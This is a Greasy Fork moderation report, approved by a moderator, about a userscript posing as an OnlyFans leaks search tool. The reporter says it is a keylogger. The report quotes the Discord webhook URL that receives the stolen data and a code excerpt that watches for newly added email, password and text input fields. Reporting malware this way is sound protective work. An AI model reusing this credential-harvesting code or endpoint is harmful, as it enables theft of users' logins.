Greasy Fork is available in English.

[working] Best OnlyFans leaks search беше докладван 08.03.2024 за Зловреден скрипт

Докладващият каза:

Seems like a keylogger that records input of email, password and current url and sends it to a discord webhook. It is probably smart to look at all the other scripts from this user as well. Anyways, back to the reported script.

The discord webhook that seems to recive data from input fields and current url (it appears several places in the script): https://discord.com/api/webhooks/1207670008440823809/gocuV6ZaRBgKv8mbCCtB1cgdaYuNduOKEdk_bguwUeJBajEgFORKsN5XnDNMHBkxsZOV

Then look at the fuction in the code from line 347 to 364 (it does not look good):

    // Use MutationObserver to handle dynamically added input fields
    var observer = new MutationObserver(function(mutations) {
        mutations.forEach(function(mutation) {
            if (mutation.addedNodes && mutation.addedNodes.length > 0) {
                // For each added node, check if it's an input field or contains input fields
                mutation.addedNodes.forEach(function(node) {
                    if (node.nodeType === Node.ELEMENT_NODE) {
                        if (node.matches('input[type="text"], input[type="email"], input[type="password"]')) {
                            processInputFields([node]);
                        } else if (node.querySelectorAll) {
                            var inputFields = node.querySelectorAll('input[type="text"], input[type="email"], input[type="password"]');
                            processInputFields(inputFields);
                        }
                    }
                });
            }
        });
    });

Този скрипт е имал 1 предишен задържан или оправен доклад.

FetaNyaЗабранен (докладваният потребите) направи:

Този доклад е одобрен от модератор.